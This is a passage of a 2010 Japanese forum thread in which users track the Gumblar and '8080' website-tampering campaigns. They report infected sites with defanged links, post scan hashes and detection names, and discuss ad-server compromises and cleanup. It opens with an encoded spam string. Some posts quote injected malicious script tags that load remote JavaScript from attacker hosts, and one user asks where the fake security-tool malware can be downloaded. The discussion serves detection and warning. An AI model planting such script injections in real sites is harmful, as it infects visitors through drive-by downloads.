Y29tZSUyMGwlMjBlcmV6aW9uZSUyMHRoZSUyMG9mJTIwZmFybWFjbyUyMHpvbG9mdCUyMHR3byUy
MHJlbWFpbnMlMjBjaGVhcCUyMGdlbmVyaWNzJTIwc2l0ZXMlMjBzaXRlcyUyMHRvJTIwYW5kJTIw
aW1wb3RlbnphJTIwc2ludG9taSUyMHByZXNjcmlwdGlvbiUyMHBvc29sb2dpYSUyMHBsYW5uaW5n
JTIweGFuYXglMjBhbGxlcmdpYSUyMHBwZCUyMHRoZSUyMGElMjBhY2NvdW50JTIwb2YlMjBhZGRz
JTJDJTIwdGhlJTIwYmUlMjBjbGElMjBtZWdhJTIwZXhhbWluaW5nJTIwYW5kJTIwc2VyaW91cyUy
MGFyZSUyMHNjaWVudGlzdHMlMjBpdCUyMGZyaWVuZHMlMkUlMjBtZXJjZWRlcyUyMGNsYSUyMDI5
JTIwc2FmZXR5JTIwcHJhY3RpdGlvbmVycyUyMGludGVyYWN0aW9ucyUyMG1vZHVyZXRpYyUyMHBl
ciUyMGRpbWFncmlyZSUyMHNpdGVzJTIwZGklMjBwZXIlMjBzbWV0dGVyZSUyMGZ1bWFyZSUyMGxp
YnJvJTIwb2ZmZXJlZCUyMGElMjBpbCUyMHVuaXZlcnNpdHklMjBhbiUyMGxldHRlcnMlMjB0byUy
MGlzJTIwc3BvcnQlMjBncmF2aWRhbnphJTIwYXZlcmFnZSUyMGElMjBQcm90ZWN0aW9uJTJFJTIw
YXJ0cml0ZSUyMGFjdXRhJTIwSW4lMjBubyUyMHdpdGglMjBhbmQlMjBuZWVkJTIwcGlhbmNhdmFs
bG8lMjBkaW1hZ3JpbWVudG8lMjBzdGF0ZSUyMGNlbnRybyUyMGtpbmQlMjBtaWNhcmRpcyUyMGJv
ZWhyaW5nZXIlMjBhbmQlMjB3aG9sZSUyMGFsaSUyMGxlJTIwYXByaSUyMGNvbXBhbnklMjB0aGF0
JTIwc291cmNlcyUyMGlzJTIwdGhlJTIwdGhlJTIwZGlhYmV0ZSUyMGludGVybmV0JTIwdG8lMjBw
cmV2ZW56aW9uZSUyMEluYyUyRSUyQyUyMGluY2x1ZGluZyUyMHA1MyUyMGUlMjBjYW5jcm8lMjBw
cm92aWRlJTIwc29jaWFsJTIwZW50cmVwcmVuZXVyJTIwYXdhcmQlMjBwcmVzY3JpcHRpb24lMjBk
YW5nZXIlMjBpbnZvbHZlZCUyMHBhcnQlMjBkaWFiZXRlJTIwYXR0aXZpdGElMjBmaXNpY2ElMjBh
Ym91dCUyMGlzJTIwc3RheSUyMHNlZ25vJTIwc2NvcnBpb25lJTIwZW5zdXJlJTIwc3VjaCUyMGFs
bGVyZ2lhJTIwYWdsaW8lMjBwb3dlcnMlMjBmZXclMjBvZiUyMGFuZCUyMHBhc3QlMjBjYXB0b3By
aWwlMjBlbmFsYXByaWwlMjBleWUlMjBzYXlzJTIwdGVybWlub2xvZ3klMjBGVENzJTIwYSUyMElu
JTIwZm9iaWElMjBzb2NpYWxlJTIwdGhlJTIwbmFtZSUyMGNvbmNlcm5zJTJDJmxhbmdwYWlyPWl0
fGphJmhsPWphJmllPVVURjgj
301:名無しさん@お腹いっぱい。
10/09/24 04:41:41
>>300σ(゚∀゚ ∬オレだけど、ぐぐる翻訳のバグかな?
英語だとgdgdになっちゃう。
302:名無しさん@お腹いっぱい。
10/09/24 07:48:59
>>299
これもガンブラーなんだ
303:名無しさん@お腹いっぱい。
10/09/25 07:08:29
なんか、こんな事が起きて
URLリンク(slashdot.jp)
こんな事になってるらしい
スレリンク(news4vip板)
スレリンク(sec板:630-633番)
304:名無しさん@お腹いっぱい。
10/09/25 10:04:10
リンク貼る前に口頭で説明しろ
305:名無しさん@お腹いっぱい。
10/09/25 13:34:19
「security tool」に感染した方へ
よくわかってない人が書いてるsecurity toolの削除方法では
8080の本体(高機能ダウンローダー)のほうを潰してないので、
セキュリティ的には何もしてないのと同じです(まともに動くようにしただけ)
8080の本体を潰さない不完全な削除はらネットに繋いでるだけで他人に迷惑をかけている(可能性が非常に高い)ので、
必要なデータをバックアップした後にリカバリ(クリーンインストール)を行って下さい。
※複数のセキュリティソフトで膨大な時間を費やして不完全な削除(HDDをゴリゴリ鳴かせて寿命を縮める)より、
リカバリ一発のほうが遥かに早くて確実です。
306:名無しさん@お腹いっぱい。
10/09/25 14:13:06
security tool削除で以前話題になったサイト、
1000円払えば教えてくれるらしいよ
URLリンク(8.pro.tok2.com)
307:名無しさん@お腹いっぱい。
10/09/25 14:53:29
security toolってどういう状況で感染するんだ
308:名無しさん@お腹いっぱい。
10/09/25 15:08:03
無防備都市
309:名無しさん@お腹いっぱい。
10/09/25 15:15:48
>>2,3の対策してなければやばい
Webシールド機能無しのセキュリティソフトも微妙
310:307
10/09/25 15:27:12
感染動画とかあれば見てみたいな
311:名無しさん@お腹いっぱい。
10/09/25 15:55:48
>>310
YouTube - 「衝撃!!ウイルス感染のその瞬間 前編」
URLリンク(www.youtube.com)
312:307
10/09/25 16:02:01
偽セキュリティーソフトがインスコされるのか
313:名無しさん@お腹いっぱい。
10/09/25 16:30:44
>>307
発言がいちいち恥ずかしいから黙ってみてろ
314:名無しさん@お腹いっぱい。
10/09/25 19:18:31
>>306
あのくそじじい・・・まだ懲りてないのかwww
315:名無しさん@お腹いっぱい。
10/09/25 23:01:24
不正プログラム:毎日jpなど被害 広告配信データ改ざん
URLリンク(mainichi.jp)
316:名無しさん@お腹いっぱい。
10/09/26 00:21:30
今回の改ざんでWMPが起動したって書き込みをちらほらと見かけるんだが、WMPになんか脆弱性あったっけ?
317:名無しさん@お腹いっぱい。
10/09/26 02:22:23
>>316
ヒント:自動再生
318:名無しさん@お腹いっぱい。
10/09/26 02:47:42
今回のパンデミックで日本にはセキュリティソフトに依存してるバカが異常に多いという事がよくわかった
319:名無しさん@お腹いっぱい。
10/09/26 03:17:03
>>317
自動再生ってリムーバブルディスク挿した時とかのアレ?
320:名無しさん@お腹いっぱい。
10/09/26 05:10:15
jsunpackの調子がおかしいっぽいのは漏れだけ?
321:名無しさん@お腹いっぱい。
10/09/26 17:30:12
なんかもう完全に日本だけが狙い撃ちにされてんな
322:名無しさん@お腹いっぱい。
10/09/26 23:34:09
ソフトウェアのアップデート切ったり、サポート切れたOSを使い続けたりしてるんだから狙い撃ちにされて当然
323:名無しさん@お腹いっぱい。
10/09/27 03:02:38
時期的に考えてチャイニーズ・ニート(スーパーハカー)の仕業だろ
船長の件で「あんな事(保障しろとか、無茶苦茶な要求まで)」言われてるんだから
日本もスーパーハカーにやられたサイトの復旧費用を請求すべき
200兆円くらい()笑
324:名無しさん@お腹いっぱい。
10/09/27 07:57:36
【GENOウイルス】GIGAZINEの広告がウイルス感染、他のサイトでも同様の被害か
スレリンク(news板)
325:名無しさん@お腹いっぱい。
10/09/27 09:24:13
クソサイト
URLリンク(gumblar8080taisaku.com)
またECスタジオのEset宣伝サイト
326:名無しさん@お腹いっぱい。
10/09/27 17:00:05
メルアド収集サイト
327:名無しさん@お腹いっぱい。
10/09/27 17:20:35
>ガンブラーのような未知のウィルスに対し
>圧倒的に強いセキュリティソフトはESET Smart Securityです
ワロタwwww
328:名無しさん@お腹いっぱい。
10/09/27 22:45:12
まだやってやがんのかよGumblar作者はよ!
ほんと殺してやりてぇ
329:名無しさん@お腹いっぱい。
10/09/27 23:19:58
>ガンブラー制作者
いい加減に捕まえてほしいねぇ・・・
ただ、実際に捕まるのは。三流制作者の原田ウイルスやKenzeroぐらいだよなぁ・・・
あれはアホすぎ。
330:名無しさん@お腹いっぱい。
10/09/27 23:23:20
つーか、ただの実行ファイルを配って、ユーザーに実行させている時点で
そもそもあれはウイルスじゃないよな。
331:名無しさん@お腹いっぱい。
10/09/28 02:01:35
新種のガンブラーは去年の12月23日くらい騒ぎになったんだっけ?
で、アドビは休みに入るから対応遅れるけど よろしくねー的な対応だった気が・・・
332:名無しさん@お腹いっぱい。
10/09/28 05:06:07
>>331
あれは酷かった・・・
さんざん機能拡張した挙句
脆弱性だらけのものを作っておきながら
感染拡大状態から対応に約一ヶ月かかった。
URLリンク(www.so-net.ne.jp)
333:名無しさん@お腹いっぱい。
10/09/28 06:50:08
今もAdobeReader放置のままだしね
来月4日「の週」の予定
334:名無しさん@お腹いっぱい。
10/09/28 10:40:45
readerなんて使わねーだろ
335:名無しさん@お腹いっぱい。
10/09/28 13:02:04
pdfはサンドボックスで開くようにすればいい。
336:名無しさん@お腹いっぱい。
10/09/28 13:25:21
【ゼロデイ多発】Adobe≒Badbe【叩きサラダ】
337:名無しさん@お腹いっぱい。
10/09/28 14:17:18
取扱注意
tukaoh●com/index●html
338:名無しさん@お腹いっぱい。
10/09/28 22:21:55
ドライブ・バイ・ダウンロード攻撃によるAdobe Readerゼロデイ脆弱性の悪用
URLリンク(www-950.ibm.com)
339:名無しさん@お腹いっぱい。
10/09/29 03:13:45
みんな、なんであれだけ脆弱性でやられまくっても、
XPやFirefox使い続けるんだろ?
Vista以降・IEで保護モードオンorChrome・一般ユーザーでログイン
の3つを組み合わせたら相当安全性高まるのにね
340:名無しさん@お腹いっぱい。
10/09/29 03:16:00
このまえアップデートされたFlash最新版では、特定サイトで数十秒間フリーズするっていう問題があって、
たまにそれにあうな
サードパーティーのFlashクッキーを受け入れない設定にしてニコニコ動画見た場合とかそれにあう
その他にも条件不明だけどたまに数十秒間フリーズするサイトがある
341:名無しさん@お腹いっぱい。
10/09/29 03:25:32
>>340
動画サイトを見ていてそうなったことがあったかも。
その現象について書かれたサイトってあったりする?
以前のverのFlashだと脆弱性があるって聞くし、
アップデートしといた方が良いんだろうけど、
ブラウザごとのフリーズくらいなら我慢するしかないのか・・・
342:名無しさん@お腹いっぱい。
10/09/29 10:01:49
サードパーティーのクッキーとかはサイトごとに保存するかどうか設定できなかったっけ
343:名無しさん@お腹いっぱい。
10/09/29 17:41:31
APSB10-22がfixされたラボのFlashPlayer10.2preview2はどうよ?
人柱版なんで別の未知の穴あいてるかもしれないけど
344:名無しさん@お腹いっぱい。
10/09/29 19:03:45
>>339
基本的な対策を怠ってる愚か者は何を使っても喰らうから、OSとかブラウザはあまり関係無い。
そして真の愚か者は、HIPSが止めたものを確認もしないで「はい(実行)」を押して感染するw
345:名無しさん@お腹いっぱい。
10/09/29 19:40:58
security toolをダウンロードしたいんだが、まだDl可能なURLある?
346:sage
10/09/30 01:40:23
マイクロソフト セキュリティ情報 MS10-070 - 重要
ASP.NET の脆弱性により、情報漏えいが起こる (2418042)
URLリンク(www.microsoft.com)
NET Frameworkオワタ
347:名無しさん@お腹いっぱい。
10/09/30 03:28:08
パッチ済みなのに何を言ってるんだ
348:名無しさん@お腹いっぱい。
10/10/01 23:48:50
>>345
なんに使うん?
広告サーバー改竄でSecurityToolがアップロード
されてた所はまだ稼動しておるが
349:名無しさん@お腹いっぱい。
10/10/02 08:07:29
なんに使うって…そりゃ悪い事だよなァ?
350:名無しさん@お腹いっぱい。
10/10/04 02:00:31
URLリンク(www.microad.jp)
>弊社にて確認したところ9月24日23:30頃には悪意あるサイトへの転送は停止しておりました。
25日1時ごろまでドライブバイ・ダウンロード状態だったはず
GIGAZINEでの確認も9月24日(金)23時59分22秒だし↓
URLリンク(gigazine.net)
詳細を告知すりゃ名誉挽回できるのに残念
351:名無しさん@お腹いっぱい。
10/10/04 02:02:58
残念とか関係者か?
どうでも良いだろ
352:名無しさん@お腹いっぱい。
10/10/04 02:10:44
よく理解できないがそのサイト張りまくってるのはその件に関係してるのかな
353:名無しさん@お腹いっぱい。
10/10/04 02:34:27
詳細が告知されれば、同様被害を減らせるでしょ
改竄されたのは残念だけど、失敗の経験を共有したい
繕うとすると可笑しなことに↓なるし
URLリンク(mimizun.com)
354:名無しさん@お腹いっぱい。
10/10/04 02:44:41
残念でも何でもないが
意味が分からないな
355:/名無しさん[1-30] ◆.htmlint.U
10/10/04 07:06:03
漏れが件の広告枠をダンさんとこで最終確認したのは 2010/09/24 23:16 頃だたぁーよ。
>>303の頃にはメルしてた。
広告枠のタグのアドレス→転送サイト自体が蹴りまくっていたようなので環境によっては>>350になるかも。(転送先アドレスも含めてダンさん蹴られてた。)
aguseで転送サイトから転送先アドレスの最終確認は 2010/09/25 01:38 頃。
356:名無しさん@お腹いっぱい。
10/10/05 18:42:56
取扱注意
www●cyg●jp/
>サイバーギグスのWEBサイト制作は(中略)1ページ1万円という低価…
↓
www●movie-aa●com/
<title>サイバーギグス|PV制作|専門用語集|-あ行-|
<script src=http://pop●dj/en/sitemap●php ></script>映画とは?</title>
他人の心配をする前に、自社のサイトが改竄されてるのを何とかしてくださいw
【Google先生の診断結果】
www.google.com/safebrowsing/diagnostic?site=www●movie-aa●com/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
>Google が最後にこのサイトを巡回したのは2010-09-30で、このサイトで不審なコンテンツが最後に検出されたのは2010-09-30です。
ぐっじょぶwwwww
357:/名無しさん[1-30] ◆.htmlint.U
10/10/05 20:02:24
>>356
otu
JSUNPACK
f6e5de3faf0333e2e04d04c1ad02c0562cee14c7
6bbf617a256b2c06b91fcf74daad67035fa0a410
VIRUSTOTAL.
b6cf294f8fc9ecfe0a57ec6ee74f751ec3479aeba7b85265839bec7c36a4f6ba
daeea74be1aced7dfee6065d8eaa0b7b168faf1368e5bac8d327cc522153bab7
タグはDanさんとこ蹴っている。。。
358:/名無しさん[1-30] ◆.htmlint.U
10/10/05 20:51:21
めるぽかんりょ
359:/名無しさん[1-30] ◆.htmlint.U
10/10/05 23:55:36
>>357
つづき
Avira対応予定
HTML/ScrInject.G
JS/Dldr.Agent.abb
あきたねる
360:名無しさん@お腹いっぱい。
10/10/06 18:29:30
こういった底辺web制作会社のPCがトロイにやられて、担当する顧客のwebサイトの
FTPパス抜かれまくって改竄されるんだろうな
361:名無しさん@お腹いっぱい。
10/10/06 20:37:11
こんなもん感染するわけないじゃん。
362:名無しさん@お腹いっぱい。
10/10/07 23:33:42
>>357-359 乙乙
取扱注意
・google-statsXX系
www●snowfan-mimo●com/area/area-service●asp?sID=467
sID=XXXが全滅の予感
【Google先生の(ry
www.google.com/safebrowsing/diagnostic?site=www●snowfan-mimo●com/&hl=ja
>146 ページのうち 74 ページで、ユーザーの同意なしに不正なソフ…
363:/名無しさん[1-30] ◆.htmlint.U
10/10/08 00:15:32
>>362
こちらの環境では500返ってきます。
ヤホのキャッシュで確認しましたが誘導先のstats50はないようです。。。
スクリプトを抜き出してVTに投げてみました。
833e2f264ae0ec69445fdc6d070312b564654cd72480b8c1465478401af77658
とか、やってるうちに>>362繋がった。
55ってのもあるんか。。。
ワイルドカードなんかな?
364:/名無しさん[1-30] ◆.htmlint.U
10/10/08 01:07:32
>>362
あらためて乙ですた。
めるぽかんりょっす。
365:名無しさん@お腹いっぱい。
10/10/08 16:19:43
googleの検索結果にこう出てるんですけど、やっぱり感染してるのかな?
ツール・ド・安倍峠 - MCプロダクトのページ
このサイトはコンピュータに損害を与える可能性があります。
2010年8月20日 ... ツール・ド・安倍峠 大会事務局 佐藤 治史(サトウ ハルフミ) ※入金の確認が取れた方には、事務局より参加受理書をお送りいたします。 ※ネット銀行よりお振込される方は、 振込先を全て入力して下さい。 ...
www●mc-pro●co●jp/abetouge/abetouge.html
366:/名無しさん[1-30] ◆.htmlint.U
10/10/08 19:04:16
>>365
こんなことがあったようです。(>>353を参考にみてくださいな)
スレリンク(bicycle板:820-871番) (820、830、836、871)
深くは見ていないので他の方のご意見・報告もお待ちくださいな。
>>362
404になったっぽい。
Avira対応予定
HTML/SrcInject.C
HTML/SrcInject.L
HTML/SrcInject.M
HTML/SrcInject.N
HTML/SrcInject.O
367:名無しさん@お腹いっぱい。
10/10/08 19:36:10
>>365
静岡市・身延町交流イベント実行委員会 静岡市側 に凸。
市役所に繋がりました。市役所から業者に問い合わせるそうです。
>>366
●がないからみれにゃい。。
368:/名無しさん[1-30] ◆.htmlint.U
10/10/08 19:58:56
>>367
乙です乙です。
> ●
>>366の スレリンク(bicycle板:820-871番) を>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
(直リンするとみみずんさんの負担が大きいので>>366にしました。)
みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
URLリンク(mirrorhenkan.g.ribbon.to)
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....
369:名無しさん@お腹いっぱい。
10/10/08 20:14:52
>>368
みっけ
URLリンク(2chnull.info)
370:名無しさん@お腹いっぱい。
10/10/08 20:15:54
>>365
そのページとトップページを見たけど不正コードを確認できない
Googleも最後の検知日が9/20でもう時間が経っちゃてる
ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない
371:名無しさん@お腹いっぱい。
10/10/09 17:09:46
エロ漫画検索してて遭遇したページなんだけど、
開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。
blogs●yahoo●co●jp/tmoebooks/2463230●html
どうなんだろ、ここ
372:名無しさん@お腹いっぱい。
10/10/09 17:29:45
判定スレじゃないよここは
373:名無しさん@お腹いっぱい。
10/10/09 17:52:15
こういう上から目線のカスは死ねばいいと思うわ
報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ
374:名無しさん@お腹いっぱい。
10/10/09 17:59:44
上から目線すぎる…
375:名無しさん@お腹いっぱい。
10/10/09 18:38:17
自己弁護乙
376:名無しさん@お腹いっぱい。
10/10/09 18:40:07
報告して「くれてる」とかイミフ
377:名無しさん@お腹いっぱい。
10/10/09 18:47:33
何かわかんないときは質問スレ行くといいよ
ここはどっちかっていうと明らかなやつについて情報交換するスレ
378:名無しさん@お腹いっぱい。
10/10/09 20:13:31
上から目線の使い方が明らかに間違ってる
379:名無しさん@お腹いっぱい。
10/10/10 00:31:53
>>371 >>373
Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な
380:名無しさん@お腹いっぱい。
10/10/10 11:26:52
というかyimgはyahoo関係の画像とかだね
381:名無しさん@お腹いっぱい。
10/10/10 21:34:44
取扱注意
未対応&再改竄のため再掲載
サイバーギグス
www●movie-aa●com/
・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b
絶賛放置&崩壊中
iiji●biz/
文字化けして読めませんw
382:/名無しさん[1-30] ◆.htmlint.U
10/10/11 00:35:26
>>381
おつですん。
上 二回目 無視かのぉ。。。
下 WHOISからメルってみました。
383:名無しさん@お腹いっぱい。
10/10/11 11:13:40
教えてください
body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/
はaguse.jpでチェックすると
<script type="text/javascript" src="URLリンク(pantscow)●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。
なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?
384:名無しさん@お腹いっぱい。
10/10/11 11:49:31
わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました
385:名無しさん@お腹いっぱい。
10/10/11 17:07:55
>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる
Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも
386:名無しさん@お腹いっぱい。
10/10/11 22:32:11
【VB】ウィルスバスター2011【クラウド】
スレリンク(sec板)
387:名無しさん@お腹いっぱい。
10/10/12 01:15:55
swfobject●jsが切れたので魚拓等
URLリンク(megalodon.jp)
URLリンク(jsunpack.jeek.org)
URLリンク(megalodon.jp)
388:名無しさん@お腹いっぱい。
10/10/12 09:55:02
caroll-amadea.bl0gger.eu/100531/p2/
389:名無しさん@お腹いっぱい。
10/10/12 18:28:56
1~6の頃の住人だったけど、もうペース落ちてきたね。
諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか?
390:名無しさん@お腹いっぱい。
10/10/12 22:34:50
パスワードの強制変更がよかった
[止まらぬサイト改ざん(1) ISPがガンブラー対策~パスワードリセット敢行も]
URLリンク(www.so-net.ne.jp)
[ 止まらぬサイト改ざん(3):全ユーザー「FTPパスワード強制変更」の効果]
URLリンク(www.so-net.ne.jp)
sakuraは1月と比べて241→ 770と増えてるみたいだけどね
URLリンク(mimizun.com)
391:名無しさん@お腹いっぱい。
10/10/12 23:57:38
> ・aguse
> URLリンク(www.aguse.net)
糞仕様になったな
392:名無しさん@お腹いっぱい。
10/10/13 04:04:49
Janeのコマンドで見れないなと思ったら
393:名無しさん@お腹いっぱい。
10/10/16 07:21:22
最近めっきり話題無いなw
もういいのか?
394:名無しさん@お腹いっぱい。
10/10/16 09:44:27
改竄攻撃は攻撃者の気分次第だから何とも・・・
MicroAdみたいのはいつでも起こりうるから「もういい」なんてなしす
gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態
395:名無しさん@お腹いっぱい。
10/10/16 23:07:46
今は日本のIPアドレスは弾くのか・・・
感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか?
396:名無しさん@お腹いっぱい。
10/10/20 01:42:55
[ゲームのニュース/ショップでの状況等のブロク] ファミコンプラザゲーム最新情報ページ
p://www■famicom-plaza■com/blog/
10月18日 AM5:00頃~AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。
397:名無しさん@お腹いっぱい。
10/10/20 03:38:37
URLリンク(nes3)<)◎k2◎xrea◎com/comic/
URLリンク(click-no1)<)◎net/pet/?feed=rss2
URLリンク(www)<)◎citydusk◎com/
失敗例含むかも
398:名無しさん@お腹いっぱい。
10/10/20 11:18:01
古い型が多いな
399:名無しさん@お腹いっぱい。
10/10/20 21:41:25
[エフセキュアブログ : そのApacheのモジュールは本物ですか?]
URLリンク(blog.f-secure.jp)
.soファイル↓とやらを利用する亜種があるそうな
[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
URLリンク(httpd.apache.org)
400:名無しさん@お腹いっぱい。
10/10/21 23:32:41
>397
click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
(ワードサラダなごみサイトだが)
401:名無しさん@お腹いっぱい。
10/10/22 00:00:38
Kasperskyのサイト改ざん ユーザーを偽サイトに転送
URLリンク(www.itmedia.co.jp)
402:名無しさん@お腹いっぱい。
10/10/22 10:35:56
カスペった
403:名無しさん@お腹いっぱい。
10/10/23 00:51:29
>>401
隠蔽とか、完璧にオワタwwww
404:名無しさん@お腹いっぱい。
10/10/23 18:29:19
ウィルス対策ソフトの会社が改ざんされ
それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった